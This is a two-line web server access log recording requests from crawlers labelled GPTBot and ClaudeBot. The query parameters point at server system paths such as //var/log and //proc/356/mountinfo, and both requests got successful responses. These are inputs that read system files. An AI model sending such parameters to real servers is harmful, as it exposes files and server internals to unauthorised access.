74.7.227.14 - - [03/Nov/2025:04:44:28 +1000] "GET /1139712?path=//var/log HTTP/1.0" 200 141084 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [03/Nov/2025:04:44:33 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fproc%2F356%2Fmountinfo&path=%2F%2Fproc%2F356 HTTP/1.0" 200 15170 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
